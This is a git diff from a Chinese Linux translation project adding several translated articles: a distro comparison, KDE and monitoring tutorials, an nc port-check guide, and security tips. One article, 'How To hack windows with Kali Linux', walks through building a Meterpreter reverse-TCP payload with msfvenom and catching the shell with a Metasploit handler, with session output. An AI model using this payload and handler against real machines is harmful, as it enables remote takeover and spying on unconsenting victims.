Linux][1],但因为安装它并不简单,我必须花费很多时间让它变成我喜欢的方式,如安装我最喜欢的桌面环境,启用 AUR(Arch 用户仓库),安装工作需要的各种应用程序和我需要在笔记本上做的一切,所以,我决定试试不同的发行版。 + +当然,我可以使用基于 Arch Linux 的发行版,比如 Antergos、Manjaro 或 Chakra GNU/Linux,但是我不是那种衍生发行版的粉丝,更不要说它们中的许多针对特定的桌面环境而构建,我不喜欢把软件包混合起来,从而最终变成了一个臃肿的系统。 + +我的意思是,如果我使用 [Arch Linux][2],并且我有时间安装它并完全配置它,那么当我可以使用“真实的东西”的时候,为什么我要选择那种只是混用了 Arch Linux 仓库/软件包的操作系统呢?所以,我去看了看 [Solus][3] 和 [openSUSE Tumbleweed][4],因为现在它们是最流行的系统之一。 + +虽然 openSUSE Tumbleweed 是一个[总是能得到最新的软件版本][5],并会迅速移动到新的 Linux 内核分支的很棒的发行版,但我觉得基于 RPM 的发行版不是我的菜。我不知道为什么,但我一直以来总是喜欢基于 DEB 的操作系统,当然直到我发现了 Arch Linux。 + +当然,openSUSE Tumbleweed 很容易安装和配置,但我决定在我的笔记本上试下 Solus,因为它现在提供 ISO 快照,所以你不必在安装后下载数百个更新,并且它预装了我每天使用的大多数应用程序。 + +[Solus 还提供最新的应用程序][6]、系统加密,而且超级容易安装。它在我笔记本上可以安装即用,Budgie 环境也可以根据你的爱好设置。我最喜欢 Solus 的是,只要我想我就可以随时升级我使用的程序,就像在 Arch Linux 上那样。 + +现在 Solus 社区不像 Arch Linux 那么大,但是随着时间的推移,它会增长,特别是你可以通过贡献新的或更新包来帮助它成长。最后,每当我想重新安装我的笔记本,我可以总是依赖我手上的 Solus Live USB。 + +我想知道你日常使用这三个系统中的哪个,特别是在你发现你不得不重新安装系统时。是的,我知道,有很多其他发行版提供了一个快速的安装过程,如 Ubuntu,这是很多人喜欢的,但哪个滚动发行版是你最喜欢的,为什么? + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/arch-linux-vs-solus-vs-opensuse-tumbleweed-your-favorite-rolling-distro-is-512599.shtml + +作者:[Marius Nestor][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:https://www.archlinux.org/ +[2]:http://news.softpedia.com/news/arch-linux-2017-02-01-released-as-the-last-iso-with-32-bit-support-download-now-512492.shtml +[3]:https://solus-project.com/ +[4]:https://en.opensuse.org/Portal:Tumbleweed +[5]:http://news.softpedia.com/news/kde-plasma-5-9-wine-2-0-and-pulseaudio-10-hit-opensuse-tumbleweed-s-repos-512541.shtml +[6]:http://news.softpedia.com/news/solus-now-powered-by-linux-kernel-4-9-7-uses-applications-from-gnome-3-22-stack-512501.shtml +[7]:http://news.softpedia.com/editors/browse/marius-nestor +[8]:http://news.softpedia.com/news/arch-linux-vs-solus-vs-opensuse-tumbleweed-your-favorite-rolling-distro-is-512599.shtml# +[9]:https://share.flipboard.com/bookmarklet/popout?v=2&title=Arch+Linux+vs.+Solus+vs.+openSUSE+Tumbleweed%3A+Your+Favorite+Rolling+Distro+Is%3F&url=http%3A%2F%2Fnews.softpedia.com%2Fnews%2Farch-linux-vs-solus-vs-opensuse-tumbleweed-your-favorite-rolling-distro-is-512599.shtml&t=1486432590&utm_campaign=widgets&utm_medium=web&utm_source=flipit&utm_content=news.softpedia.com +[10]:http://news.softpedia.com/news/arch-linux-vs-solus-vs-opensuse-tumbleweed-your-favorite-rolling-distro-is-512599.shtml# +[11]:http://twitter.com/intent/tweet?related=softpedia&via=mariusnestor&text=Arch+Linux+vs.+Solus+vs.+openSUSE+Tumbleweed%3A+Your+Favorite+Rolling+Distro+Is%3F&url=http%3A%2F%2Fnews.softpedia.com%2Fnews%2Farch-linux-vs-solus-vs-opensuse-tumbleweed-your-favorite-rolling-distro-is-512599.shtml +[12]:https://plus.google.com/share?url=http://news.softpedia.com/news/arch-linux-vs-solus-vs-opensuse-tumbleweed-your-favorite-rolling-distro-is-512599.shtml +[13]:https://twitter.com/intent/follow?screen_name=mariusnestor diff --git a/published/20170205 How to Activate the Global Menu in Kde Plasma 5.9.md b/published/20170205 How to Activate the Global Menu in Kde Plasma 5.9.md new file mode 100644 index 0000000000..8941232c38 --- /dev/null +++ b/published/20170205 How to Activate the Global Menu in Kde Plasma 5.9.md @@ -0,0 +1,73 @@ +如何在 KDE Plasma 5.9 中激活全局菜单 +============================================================ + + ![Global Menus in Kde Plasma 5.9](http://fasterland.net/wp-content/uploads/2017/02/plasma59-globalmenus-750x411.jpg) + +全局菜单是 KDE Plasma 5.9 这个最新的 KDE 桌面环境主版本中的最有趣的功能之一。 + +全局菜单允许用户将应用程序菜单(application menu)放到程序内,作为标题栏按钮或放到屏幕顶部的组件面板中。 + +全局菜单是一个用户渴望的令人兴奋的功能,但不幸的是,由于某些原因,如果你不知道在哪里找到它,启用它可能有点复杂。 + +在本教程中,我们将了解如何启用“标题栏按钮”和“应用程序组件”菜单。 + +### 标题栏按钮 + +[ + ![Titlebar Button Plasma 5.9](http://fasterland.net/wp-content/uploads/2017/02/plasma-59-titlebar-button.png) +][4] + +*Plasma 5.9 中 Konsole 的标题栏按钮 widget* + +标题栏按钮是放置在标题栏中的一个小图标,用户可以通过点击它来访问应用程序菜单。要启用它,打开系统设置(System Settings)并进入应用程序样式(Application Style)选项。 在组件样式(Widget Style)设置中,进入微调(Fine Tuning)选项卡,然后选择标题栏按钮(Title bar button)作为菜单样式(Menubar style)选项。 + +[ + ![The Widget Style panel](http://fasterland.net/wp-content/uploads/2017/02/plasma-59-widget-style-panel.png) +][5] + +*组件样式面板* + +在此之后,要使用它,你需要_手动_放置标题按钮,因为它不是自动出现的。 + +为此,请进入应用程序样式(Application Style)的窗口装饰(Windows Decoration)。进入按钮(Buttons)选项卡,并将小的应用程序菜单(Application Menu)图标拖动到标题栏按钮(Title bar)中。 + +[ + ![Drag this button into the titlebar](http://fasterland.net/wp-content/uploads/2017/02/plasma59-titlebar-drag-button.png) +][6] + +*拖动这个按钮到标题栏中* + +现在你可以在任何有应用菜单的程序中看到标题栏按钮了。 + +### 应用程序菜单组件 + +[ + ![Application Menu Bar in Plasma 5.9](http://fasterland.net/wp-content/uploads/2017/02/plasma59-application-menu-bar.jpg) +][7] + +*Plasma 5.9 中的应用菜单面板* + +要启用应用程序菜单组件,请在微调(Fine Tuning)选项卡的菜单样式(Menu Style)选项中选择相关条目。 + +在桌面上右键单击,然后选择添加面板(Add Panel)-> 应用程序菜单栏(Application Menu Bar)。 + +如你所见,如果你不知道在哪里找到它,启用“全局菜单”可能会有点复杂。无论如何,虽然我非常感谢 KDE 团队为这个新的 Plasma 主要版本做了出色的工作,但是我希望他们继续提高桌面可用性,让那些不想花时间在互联网上搜索这样的教程的人而言,使这个新的有趣的功能更容易启用。 + +-------------------------------------------------------------------------------- + +via: http://fasterland.net/activate-global-menu-kde-plasma-5-9.html + +作者:[Francesco Mondello][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://fasterland.net/ +[1]:http://fasterland.net/author/faster3ck +[2]:http://fasterland.net/ +[3]:http://fasterland.net/category/linux-howtos +[4]:http://fasterland.net/wp-content/uploads/2017/02/plasma-59-titlebar-button.png +[5]:http://fasterland.net/wp-content/uploads/2017/02/plasma-59-widget-style-panel.png +[6]:http://fasterland.net/wp-content/uploads/2017/02/plasma59-titlebar-drag-button.png +[7]:http://fasterland.net/wp-content/uploads/2017/02/plasma59-application-menu-bar.jpg diff --git a/published/20170206 How to Check Remote Ports are Reachable Using nc Command.md b/published/20170206 How to Check Remote Ports are Reachable Using nc Command.md new file mode 100644 index 0000000000..211aeeb9b2 --- /dev/null +++ b/published/20170206 How to Check Remote Ports are Reachable Using nc Command.md @@ -0,0 +1,72 @@ +使用 nc 命令检查远程端口是否打开 +============================================================ + +**端口**是与 Linux 操作系统上的应用或进程的通讯端点的逻辑实体。在使用之前,了解目标机器上哪些端口是打开并正在运行服务是非常有用的。 + +我们可以使用 [netstat][4] 或其他几个 Linux 命令如 [NMAP][5] 在本地机器上轻松地[列出 Linux 中的打开端口][3]。 + +在本指南中,我们将向你展示如何使用简单的 `netcat`(简称 `nc`)命令来确定远程主机上的端口是否可访问/打开。 + +`netcat`(或简称 `nc`)是一个功能强大且易于使用的程序,可用于 Linux 中与 TCP、UDP 或 UNIX 域套接字相关的任何事情。 + +``` +# yum install nc [在 CentOS/RHEL 中] +# dnf install nc [在 Fedora 22+ 中] +$ sudo apt-get install netcat [在 Debian/Ubuntu 中] +``` + +我们可以使用它:打开 TCP 连接、侦听任意 TCP 和 UDP 端口、发送 UDP 数据包、在 IPv4 和 IPv6 进行端口扫描。 + +使用 **netcat**,你可以检查单个或多个或一段打开的端口范围,如下所示。下面的命令将帮助我们查看端口 22 是否在主机 192.168.56.10 上打开: + +``` +$ nc -zv 192.168.1.15 22 +``` + +上面的命令中,这些标志是: + +1. `-z` – 设置 nc 只是扫描侦听守护进程,实际上不向它们发送任何数据。 +2. `-v` – 启用详细模式 + +下面的命令会检查远程主机 192.168.5.10 上是否打开了端口 80、22 和 21(我们也可以使用主机名): + +``` +nc -zv 192.168.56.10 80 22 21 +``` + +也可以指定端口扫描的范围: + +``` +$ nc -zv 192.168.56.10 20-80 +``` + +更多关于 netcat 命令的例子和使用,阅读我们下面的文章。 + +1.  [使用 netcat 命令在 Linux 服务器间传输文件][1] +2.  [Linux 网络配置及排障调试命令][2] + +就是这样。在本文中,我们解释了如何使用 netcat 命令检测远程主机端口是否可达/打开。请在评论栏中留下你的想法。 + +-------------------------------------------------------------------------------- + +译者简介: + +Aaron Kili 是 Linux 和 F.O.S.S 爱好者,将来的 Linux SysAdmin 和 web 开发人员,目前是 TecMint 的内容创建者,他喜欢用电脑工作,并坚信分享知识。 + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/check-remote-port-in-linux/ + +作者:[Aaron Kili][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/transfer-files-between-two-linux-machines/ +[2]:http://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands/ +[3]:http://www.tecmint.com/find-open-ports-in-linux/ +[4]:http://www.tecmint.com/20-netstat-commands-for-linux-network-management/ +[5]:http://www.tecmint.com/nmap-command-examples/ diff --git a/published/20170207 CloudStats – Best Server Monitoring Tool for SaaS Businesses and Everyone Else.md b/published/20170207 CloudStats – Best Server Monitoring Tool for SaaS Businesses and Everyone Else.md new file mode 100644 index 0000000000..972a14499b --- /dev/null +++ b/published/20170207 CloudStats – Best Server Monitoring Tool for SaaS Businesses and Everyone Else.md @@ -0,0 +1,80 @@ +CloudStats :SaaS 服务器监控工具 +============================================================ + +CloudStats 是一个简单而强大的[服务器监控][1]和网络监控工具。使用 CloudStats,你可以监控来自世界上任何地方的服务器和网络的所有指标。 + +最棒的是你不需要有任何特殊的技术技能 - CloudStats 很容易安装在任何数据中心的任何服务器上。 + +CloudStats 允许你使用任何操作系统对任何服务器执行服务器监视。它只需要在你的服务器上运行一个命令,即可获取所有服务器的统计信息。 + +在服务器和 CloudStats 之间的同步完成后,你将获得有关你的服务器和网络的完整信息,包括 CPU、磁盘、RAM、网络使用情况等。你还可以监控 Apache、MySQL、邮件、FTP、DNS 和其他服务。 + +这里有几个关于 CloudStats 监控的截图。 + +[ + ![CloudStats - Server Overview](http://www.tecmint.com/wp-content/uploads/2017/02/CloudStats-Server-Overview.png) +][2] + +*CloudStats – 服务器概览* + +[ + ![CloudStats - Server Monitoring Overview](http://www.tecmint.com/wp-content/uploads/2017/02/CloudStats-Server-Monitoring-Overview.png) +][3] + +*CloudStats – 服务监控概览* + +[ + ![CloudStats - List of Servers for Monitoring](http://www.tecmint.com/wp-content/uploads/2017/02/CloudStats-Server-Monitoring.png) +][4] + +*CloudStats – 监控的服务器列表* + +如果系统中出现问题,CloudStats 将立即发出警报:你将在你的帐户界面中看到问题通知,并且还会通过电子邮件、Skype 或 Slack 接收警报。这将帮助你及时检测和修复服务器功能中的任何问题并防止停机。 + +使用 CloudStats 的另一个原因是,你可以登录 CloudStats 帐户,从任何地方(无论你在哪里)使用家庭或办公室PC、智能手机或平板电脑检查 IT 基础架构的状态。 + +[CloudStats 服务监控][5]服务基于 Microsoft Azure 云技术运行,确保其监控结果始终是正确的及最新的。 + +###### 下面是 CloudStats 的一些功能: + +1. Linux 及 Windows 服务监控 +2. 数据备份工具 +3. 网络监控 +4. 进程监控 +5. 服务状态检查 +6. 外部检查 +7. URL 监控及 PingMap +8. Email、Skype 及 Slack 警告 +9. 有免费账户 + +使用 CloudStats 后你将能够监控数百台服务器。此工具适用于商业和个人使用。与现有的服务器和网络监控服务相比,CloudStats 解决方案更便宜、更易于安装和更有用。 + +现在[注册一个可以监控多达 10 台服务器、网站和 IP 地址免费的个人][6]账户! + +-------------------------------------------------------------------------------- + +作者简介: + +我是 Ravi Saive,TecMint 的创建者。一个喜欢在互联网上分享技巧和提示计算机 Geek 和 Linux 专家。我的大多数服务器运行在 Linux 开源平台上。在 Twitter、Facebook 和 Google+ 上关注我。 + +-------------------------------------------------------------------------------- + + +via: http://www.tecmint.com/cloudstats-linux-server-monitoring-tool/ + +作者:[Ravi Saive][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/admin/ +[00]:https://twitter.com/ravisaive +[01]:https://www.facebook.com/ravi.saive +[02]:https://plus.google.com/u/0/+RaviSaive +[1]:https://servermonitoring.me/?utm_source=tecmint1&utm_campaign=tecmint1&utm_medium=tecmintpost1 +[2]:http://www.tecmint.com/wp-content/uploads/2017/02/CloudStats-Server-Overview.png +[3]:http://www.tecmint.com/wp-content/uploads/2017/02/CloudStats-Server-Monitoring-Overview.png +[4]:http://www.tecmint.com/wp-content/uploads/2017/02/CloudStats-Server-Monitoring.png +[5]:https://servermonitoring.me/?utm_source=tecmint1&utm_campaign=tecmint1&utm_medium=tecmintpost1 +[6]:https://servermonitoring.me/?utm_source=tecmint1&utm_campaign=tecmint1&utm_medium=tecmintpost1 diff --git a/published/20170207 How To hack windows with Kali Linux.md b/published/20170207 How To hack windows with Kali Linux.md new file mode 100644 index 0000000000..3607de8503 --- /dev/null +++ b/published/20170207 How To hack windows with Kali Linux.md @@ -0,0 +1,173 @@ +如何使用 Kali Linux 黑掉 Windows +==================== + +Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。 + +### 源机器详情 + +Kali Linux + +``` +root@kali:/# uname -a +Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux +root@kali:/# +``` + +用做攻击对象的目标机器: + +``` +Windows 7 Ultimate SP1 +``` + +### 步骤 1:创建 Payload 程序 + +Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(`program.exe`),以便能使用 Kali Linux 黑掉 Windows。 + +``` +root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe +No platform was selected, choosing Msf::Module::Platform::Windows from the payload +No Arch selected, selecting Arch: x86 from the payload +No encoder or badchars specified, outputting raw payload +Payload size: 333 bytes +Final size of exe file: 73802 bytes +Saved as: /root/program.exe +root@kali:/# ls -la /root/program.exe +-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe +``` + +通过 `ls` 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。 + +### 步骤 2:运行 `mfsconsole` 命令启动 msf 命令窗口 + +``` +root@kali:# msfconsole + + + .,,. . + .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P + d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p + d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88' + d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P + 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b + d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b +d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 + .a#$$$$$$"` 88b d8P 88b`?8888P' + ,s$$$$$$$"` 888888P' 88n _.,,,ass;: + .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' + .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' + ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' + .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' +_______________________________________________________________ ,&$$$$$$'_____ + ll&&$$$$' + .;;lll&&&&' + ...;;lllll&' + ......;;;llll;;;.... + ` ......;;;;... . . + + +Taking notes in notepad? Have Metasploit Pro track & report +your progress and findings -- learn more on http://rapid7.com/metasploit + + =[ metasploit v4.12.22-dev ] ++ -- --=[ 1577 exploits - 906 auxiliary - 272 post ] ++ -- --=[ 455 payloads - 39 encoders - 8 nops ] ++ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] + +msf > +``` + +### 步骤 3:进行漏洞利用的细节 + +* 4444 端口:你可以按照自己的想法来选择使用哪个端口 +* LHOST IP:表示 Kali Linux 机器的 IP,这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。 + +``` +root@kali:/# ip r l +192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100 +root@kali:/# +``` + +现在在 msf 命令窗口使用 `use exploit/multi/handler` 命令,如下: + +``` +msf > use exploit/multi/handler +msf exploit(handler) > +``` + +然后在接下来的命令窗口中使用命令 `set payload windows/meterpreter/reverse_tcp`: + +``` +msf exploit(handler) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +``` + +现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,如下: + +``` +msf exploit(handler) > set lhost 192.168.189.128 +lhost => 192.168.189.128 +msf exploit(handler) > set lport 4444 +lport => 4444 +``` + +最后使用 `exploit` 命令。 + +``` +msf exploit(handler) > exploit + +[*] Started reverse TCP handler on 192.168.189.128:4444 +[*] Starting the payload handler... +``` + +现在你需要在 Windows 上运行 `program.exe`,一旦它在目标机器上执行,你就可以建立一个 meterpreter 会话。输入 `sysinfo` 就可以得到这台被黑掉的 Windows 机器的详情。 + +``` +msf exploit(handler) > exploit + +[*] Started reverse TCP handler on 192.168.189.128:4444 +[*] Starting the payload handler... +[*] Sending stage (957999 bytes) to 192.168.189.1 +[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 + +meterpreter > sysinfo +Computer : MANN-PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 (Current Process is WOW64) +System Language : en_IN +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 +``` + +一旦你得到了这些详细信息,就可以做更多的漏洞利用,或者通过 `help` 命令获取更多信息,以便列出你可以黑掉该系统的所有选项,比如 `webcam_snap` 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!! ←_← + +------------------------------------ + +译者简介: + +[GHLandy](http://GHLandy.com) —— 划不完粉腮柳眉泣别离。 + +------------------------------------ + +via: http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/ + +作者:[Manmohan Mirkar][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/ +[1]:http://www.linuxroutes.com/author/admin/ +[2]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/#respond +[3]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[4]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[5]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[6]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[7]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[8]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[9]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[10]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[11]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[12]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# +[13]:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/# diff --git a/published/20170208 5 security tips for shared and public computers.md b/published/20170208 5 security tips for shared and public computers.md new file mode 100644 index 0000000000..b8a90eadc3 --- /dev/null +++ b/published/20170208 5 security tips for shared and public computers.md @@ -0,0 +1,49 @@ +如何在使用网吧或公用计算机时保持数据安全 +============================================= + +![](https://cdn.fedoramagazine.org/wp-content/uploads/2016/09/securitytips-945x400.png) + +对我们许多人来说,安全最重要的是使我们的个人数据安全。理论上,最好的安全能够承受任何滥用。然而,在现实世界中,你不能覆盖_所有_可能的滥用情况。因此,最好的策略是使用多种技术来提高安全性。大多数正常人不需要复杂的方案和[加密][2]来保持安全,但是可以让入侵者访问你的数据变得很困难。 + +这可能听起来很蠢,但在图书馆,教室或实验室中的计算机 - 或者你的朋友的电话 - 它们不是你的。即使是云或云服务通常也只是别人的计算机。一般来说,将你不拥有的任何设备视为属于坏人所有,换句话说,他们想要你的数据用于邪恶用途。 + +以下是一些简单的方法,可以增加你的数据安全性来应对不法之徒或入侵者。 + +### 关闭打开的会话 + +当你用完设备后,登出如 Facebook 或其他站点服务。这可以防止作恶者重新打开窗口并访问你的账户。 + +### 清理浏览器和其他缓存 + +清理你浏览器中所有的历史、密码和 cookie。不要假设这些是登出后默认的动作。这取决于平台,同时检查缓存。如果你使用的是 Linux 系统,删除 `~/.cache` 缓存文件夹。 + +### 清空垃圾箱 + +删除桌面上遗留的任何东西,如果可以,同时清空垃圾箱。 + +### 使用服务安全选项 + +为你的服务和帐户启用登录通知或登录批准。某些服务有一个选项,当有人从新设备或位置登录你的帐户时通知你。当你登录时,你也会收到通知。但是,知道某些人是否尝试从其他计算机或位置意外地使用你的登录信息还是很有帮助的。 + +一些服务可能允许你通过电子邮件通知来批准任何登录活动。只有通过你收到的电子邮件中的链接进行批准,才能授予访问权限。检查你的服务,看看他们是否提供这些安全选项。 + +### 限制敏感信息 + +在不属于你的计算机上保持数据安全的最简单的方法是不要处理它。尽量避免或限制需要敏感信息的工作。例如,你可能不想在工作场所访问银行或信用卡帐户或者安全系统。 + +你可能需要考虑使用基于 Live USB 的操作系统来实现这些目的。Live USB 会限制甚至完全避免在运行它的主机系统上的任何数据存储。例如,你可以[下载 Live Fedora Workstation 操作系统][3]在 USB 上使用。 + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/5-security-tips-shared-public-computers/ + +作者:[Sylvia Sánchez][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://lailah.id.fedoraproject.org/ +[1]:https://fedoramagazine.org/5-security-tips-shared-public-computers/ +[2]:https://en.wikipedia.org/wiki/Cryptography +[3]:https://getfedora.org/workstation/download/ diff --git a/published/20170208 rtop – An Interactive Tool to Monitor Remote Linux Server Over SSH.md b/published/20170208 rtop – An Interactive Tool to Monitor Remote Linux Server Over SSH.md new file mode 100644 index 0000000000..aa1801de48 --- /dev/null +++ b/published/20170208 rtop – An Interactive Tool to Monitor Remote Linux Server Over SSH.md @@ -0,0 +1,111 @@ +rtop:一个通过 SSH 监控远程主机的交互式工具 +============================================================ + +rtop 是一个基于 SSH 的直接的交互式[远程系统监控工具][2],它收集并显示重要的系统性能指标,如 CPU、磁盘、内存和网络指标。 + +它用 [Go 语言][3]编写,不需要在要监视的服务器上安装任何额外的程序,除了 SSH 服务器和登录凭据。 + +rtop 基本上是通过启动 SSH 会话和[在远程服务器上执行某些命令][4]来收集各种系统性能信息。 + +一旦 SSH 会话建立,它每隔几秒(默认情况下为 5 秒)刷新来自远程服务器收集的信息,类似于 Linux 中的所有其它[类似 top 的使用程序(如 htop)][5]。 + +#### 安装要求: + +要安装 rtop 确保你已经在 Linux 中安装了 Go(GoLang)1.2 或更高版本,否则请点击下面的链接根据步骤安装 GoLang: + +- [在 Linux 中安装 GoLang (Go 编程语言)][1] + +### 如何在 Linux 系统中安装 rtop + +如果你已经安装了 Go,运行下面的命令构建 rtop: + +``` +$ go get github.com/rapidloop/rtop +``` + +命令完成后 rtop 可执行程序会保存在 $GOPATH/bin 或者 $GOBIN 中。 + +[ + ![Build rtop in Linux](http://www.tecmint.com/wp-content/uploads/2017/02/Build-rtop-Tool.png) +][6] + +*在 Linux 中构建 rtop* + +注意:使用 rtop 不需要任何运行时环境或配置。 + +### 如何在 Linux 系统中使用 rtop + +尝试不用任何标志或参数运行 rtop, 会显示如下信息: + +``` +$ $GOBIN/rtop +``` + +示例输出: + +``` +rtop 1.0 - (c) 2015 RapidLoop - MIT Licensed - http://rtop-monitor.org +rtop monitors server statistics over an ssh connection +Usage: rtop [-i private-key-file] [user@]host[:port] [interval] +-i private-key-file +PEM-encoded private key file to use (default: ~/.ssh/id_rsa if present) +[user@]host[:port] +the SSH server to connect to, with optional username and port +interval +refresh interval in seconds (default: 5) +``` + +现在让我们用 rtop 监控远程 Linux 服务器,默认每 5 秒刷新收集到的信息: + +``` +$ $GOBIN/rtop aaronkilik@10.42.0.1 +``` +[ + ![rtop - Monitor Remote Linux Server](http://www.tecmint.com/wp-content/uploads/2017/02/Monitor-Remote-Linux-Server.png) +][7] + +*rtop – 监控远程 Linux 主机* + +命令会每隔 10 秒刷新系统性能指标: + +``` +$ $GOBIN/rtop aaronkilik@10.42.0.1 10 +``` + +rtop 同样可以使用 ssh-agent、[密钥][8]或者密码授权连接。 + +访问 rtop 的 Github 仓库:[https://github.com/rapidloop/rtop][9]。 + +总结一下,rtop 是一个简单易用的远程服务器监控工具,它使用非常少且直白的选项。你可以阅读服务器中其他[监控系统的命令行工具][10]来提高你的[ Linux 性能监控][11]技能。 + +最后,在下面的评论栏中留下你的任何问题和想法。 + +-------------------------------------------------------------------------------- + +作者简介: + +Aaron Kili 是 Linux 和 F.O.S.S 爱好者,将来的 Linux SysAdmin 和 web 开发人员,目前是 TecMint 的内容创建者,他喜欢用电脑工作,并坚信分享知识。 + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/rtop-monitor-remote-linux-server-over-ssh/ + +作者:[Aaron Kili][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/install-go-in-linux/ +[2]:http://www.tecmint.com/command-line-tools-to-monitor-linux-performance/ +[3]:http://www.tecmint.com/install-go-in-linux/ +[4]:http://www.tecmint.com/execute-commands-on-multiple-linux-servers-using-pssh/ +[5]:http://www.tecmint.com/install-htop-linux-process-monitoring-for-rhel-centos-fedora/ +[6]:http://www.tecmint.com/wp-content/uploads/2017/02/Build-rtop-Tool.png +[7]:http://www.tecmint.com/wp-content/uploads/2017/02/Monitor-Remote-Linux-Server.png +[8]:http://www.tecmint.com/ssh-passwordless-login-using-ssh-keygen-in-5-easy-steps/ +[9]:https://github.com/rapidloop/rtop +[10]:http://www.tecmint.com/command-line-tools-to-monitor-linux-performance/ +[11]:http://www.tecmint.com/linux-performance-monitoring-tools/ diff --git a/translated/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md b/published/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md similarity index 59% rename from translated/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md rename to published/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md index 17cef78ae9..e91c232d32 100644 --- a/translated/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md +++ b/published/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md @@ -9,55 +9,55 @@ LXD 2.0 系列(六):远程主机及容器迁移 LXD 2.0 支持两种协议: -* LXD 1.0 API:这是在客户端和LXD守护进程之间使用的REST API,以及在复制/移动镜像和容器时在LXD守护进程之间使用的REST API。 